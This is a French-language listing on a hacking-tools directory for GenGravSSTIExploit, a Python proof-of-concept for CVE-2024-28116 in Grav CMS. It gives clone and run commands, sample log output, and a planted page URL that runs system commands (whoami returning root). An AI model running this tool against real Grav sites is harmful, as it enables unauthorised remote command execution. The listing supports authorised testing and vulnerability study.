Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
GenGravSSTIExploit — est un script Python de PoC qui exploite une vulnérabilité authentifiée d'injection de template côté serveur (SSTI) dans Grav CMS versions <= 1.7.44 (CVE-2024-28116) | Kitploit
Outils/GitHubGitHub/geniuszly/gengravsstiexploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

est un script Python de PoC qui exploite une vulnérabilité authentifiée d'injection de template côté serveur (SSTI) dans Grav CMS versions <= 1.7.44 (CVE-2024-28116)

Voir le dépôt
72il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

EN

GenGravSSTIExploit est un script PoC Python qui exploite une vulnérabilité authentifiée d'injection de templates côté serveur (SSTI) dans Grav CMS versions <= 1.7.44 (CVE-2024-28116). Cette vulnérabilité permet à un utilisateur disposant des droits d'éditeur d'exécuter des commandes système sur un serveur distant.

Remarque : Ce script nécessite des identifiants valides pour s'authentifier sur la console Grav CMS.

Fonctionnalités

  • S'authentifie auprès du panneau d'administration Grav CMS à l'aide des identifiants d'éditeur.
  • Crée une nouvelle page sur le CMS pour injecter une charge utile.
  • Exécute des commandes système à distance en exploitant la vulnérabilité SSTI.

Prérequis

  • Python 3.x
  • Bibliothèque requests (installer avec pip install requests)

Utilisation

  1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. Configurer les identifiants

    Modifiez le script pour fournir vos identifiants d'éditeur Grav CMS :

    root@kitploit:~
    GRAV_USER = "votreutilisateur"
    GRAV_PASSWORD = "votremotdepasse"
    
  3. Exécuter le script

    Utilisez la commande suivante pour lancer le script :

    root@kitploit:~
    python GenGravSSTIExploit.py -t <URL_CIBLE> -p <PORT>
    
    • <URL_CIBLE> : URL cible au format http[s]://nomhôte.
    • <PORT> : Numéro de port (par défaut 80).

    Exemple :

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. Interagir avec l'exploit

    Si l'exploit est réussi, vous obtiendrez une URL où vous pourrez exécuter des commandes système :

    root@kitploit:~
    [+] Charge utile RCE injectée. Visitez la page malveillante : http://example.com:8080/poc_<ID>?do=<commande>
    

Exemple de sortie

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

Le script effectuera chaque étape en vous fournissant des mises à jour via le terminal. Voici ce que vous pourriez voir :

root@kitploit:~
2024-10-02 12:00:01 - INFO - Vérification de l'URL cible...
2024-10-02 12:00:02 - INFO - Obtention du cookie de session et du login-nonce...
2024-10-02 12:00:03 - INFO - Tentative d'authentification sur Grav CMS...
2024-10-02 12:00:04 - INFO - Accès au panneau d'administration après authentification...
2024-10-02 12:00:05 - INFO - Création d'une nouvelle page...
2024-10-02 12:00:06 - INFO - Obtention du form-nonce et de l'unique_form_id...
2024-10-02 12:00:07 - INFO - Injection de la charge utile RCE...
2024-10-02 12:00:08 - INFO - [+] Injection RCE réussie. Rendez-vous à l'adresse : http://example.com:8080/poc_4T7B?do=<commande>

Une fois le script terminé, vous verrez un message contenant le lien vers la page injectée. Vous pouvez visiter ce lien pour exécuter des commandes système :

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

La visite de l'URL avec la commande spécifiée affichera la sortie directement sur la page :

root@kitploit:~
Cmd-Output :
root

Avertissement

Cet outil est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous disposez d'une autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce script.

Télécharger l’outil